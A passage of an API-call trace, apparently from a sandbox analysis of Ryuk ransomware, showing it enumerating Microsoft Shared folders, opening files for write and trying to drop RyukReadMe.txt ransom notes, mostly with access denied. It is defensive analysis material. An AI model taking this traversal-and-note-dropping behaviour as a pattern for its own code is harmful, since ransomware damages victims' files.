flProtect=0x4) returned 0x350000 [0131.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf", dwFileAttributes=0x80) returned 0 [0131.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Seyes.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\seyes.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.849] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.849] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.849] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.849] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.849] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm", dwFileAttributes=0x80) returned 0 [0131.849] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shades of Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shades of blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.850] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.850] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.850] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.850] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.850] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg", dwFileAttributes=0x80) returned 0 [0131.853] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\ShadesOfBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shadesofblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.853] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.853] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.853] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.853] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.853] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf", dwFileAttributes=0x80) returned 0 [0131.854] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Shorthand.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\shorthand.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.854] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.854] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.854] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.854] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.854] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg", dwFileAttributes=0x80) returned 0 [0131.855] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Small_News.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\small_news.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.855] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.855] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.855] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.855] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.855] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm", dwFileAttributes=0x80) returned 0 [0131.856] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Soft Blue.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\soft blue.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.856] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.856] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.856] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.856] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.856] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg", dwFileAttributes=0x80) returned 0 [0131.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\SoftBlue.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\softblue.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.857] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.857] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.857] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.857] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm", dwFileAttributes=0x80) returned 0 [0131.857] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.857] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.857] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.857] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.857] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.858] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg", dwFileAttributes=0x80) returned 0 [0131.858] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stars.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stars.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.858] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.858] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.858] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.859] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif", dwFileAttributes=0x80) returned 0 [0131.859] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Stucco.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\stucco.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.859] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.859] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.859] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.859] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.859] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg", dwFileAttributes=0x80) returned 0 [0131.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tanspecks.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tanspecks.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.860] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.860] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.860] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.860] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.860] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif", dwFileAttributes=0x80) returned 0 [0131.860] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Tiki.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\tiki.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.861] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf", dwFileAttributes=0x80) returned 0 [0131.861] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\To_Do_List.emf" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\to_do_list.emf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.861] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.861] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.861] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.861] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg", dwFileAttributes=0x80) returned 0 [0131.862] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\White_Chocolate.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\white_chocolate.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.862] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.862] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.862] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.862] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.862] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif", dwFileAttributes=0x80) returned 0 [0131.863] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Wrinkled_Paper.gif" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\wrinkled_paper.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.863] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.863] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.863] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.863] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.864] SetLastError (dwErrCode=0x0) [0131.864] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.868] GetLastError () returned 0x5 [0131.868] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.868] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.868] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.868] SetLastError (dwErrCode=0x0) [0131.868] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.869] GetLastError () returned 0x5 [0131.869] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.869] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0131.869] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.869] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.869] SetLastError (dwErrCode=0x0) [0131.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.869] GetLastError () returned 0x5 [0131.869] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.869] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.869] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0131.869] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0131.869] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0 [0131.869] FindClose (in: hFindFile=0x3bb4e0 | out: hFindFile=0x3bb4e0) returned 1 [0131.870] SetLastError (dwErrCode=0x0) [0131.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\en-US\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\en-us\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.870] GetLastError () returned 0x5 [0131.870] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0131.870] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.870] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.870] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.870] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.870] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV", dwFileAttributes=0x80) returned 0 [0131.870] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.870] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.870] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.870] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.870] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.871] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv", dwFileAttributes=0x80) returned 0 [0131.972] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\Wks9Pxy.cnv" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wks9pxy.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.972] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.973] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.973] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.973] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV", dwFileAttributes=0x80) returned 0 [0131.973] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT532.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft532.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.973] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.973] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.973] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0131.973] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0131.974] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV", dwFileAttributes=0x80) returned 0 [0131.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\WPFT632.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\wpft632.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.974] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0131.974] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0 [0131.974] FindClose (in: hFindFile=0x3bd480 | out: hFindFile=0x3bd480) returned 1 [0131.974] SetLastError (dwErrCode=0x0) [0131.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.974] GetLastError () returned 0x5 [0131.974] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.974] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.974] FindNextFileW (in: hFindFile=0x3bd420, lpFindFileData=0x29ad240 | out: lpFindFileData=0x29ad240) returned 1 [0131.974] SetLastError (dwErrCode=0x0) [0131.974] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0131.975] GetLastError () returned 0x5 [0131.975] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29ad1f0, lpOverlapped=0x0) returned 0 [0131.975] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0131.975] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\*.*", lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 0x3bd480 [0132.053] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.100] FindNextFileW (in: hFindFile=0x3bd480, lpFindFileData=0x29aca90 | out: lpFindFileData=0x29aca90) returned 1 [0132.100] SetLastError (dwErrCode=0x0) [0132.100] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\RyukReadMe.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\ryukreadme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.100] GetLastError () returned 0x5 [0132.100] WriteFile (in: hFile=0xffffffffffffffff, lpBuffer=0x13f108500, nNumberOfBytesToWrite=0x320, lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29aca40, lpOverlapped=0x0) returned 0 [0132.100] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.100] FindFirstFileW (in: lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\*.*", lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 0x3bb4e0 [0132.100] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.100] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.100] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.100] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM", dwFileAttributes=0x80) returned 0 [0132.140] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.ELM" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.elm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.140] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.140] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.141] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.141] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.141] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF", dwFileAttributes=0x80) returned 0 [0132.141] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\AFTRNOON.INF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\aftrnoon\\aftrnoon.inf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffffffffffff [0132.141] CloseHandle (hObject=0xffffffffffffffff) returned 0 [0132.141] VirtualFree (lpAddress=0x350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0132.141] FindNextFileW (in: hFindFile=0x3bb4e0, lpFindFileData=0x29ac2e0 | out: lpFindFileData=0x29ac2e0) returned 1 [0132.141] VirtualAlloc (lpAddress=0x0, dwSize=0x2710, flAllocationType=0x1000, flProtect=0x4) returned 0x350000 [0132.141] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF", dwFileAttributes=0x80) returned 0 [0132.178] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\AFTRNOON\\PREVIEW.GIF" 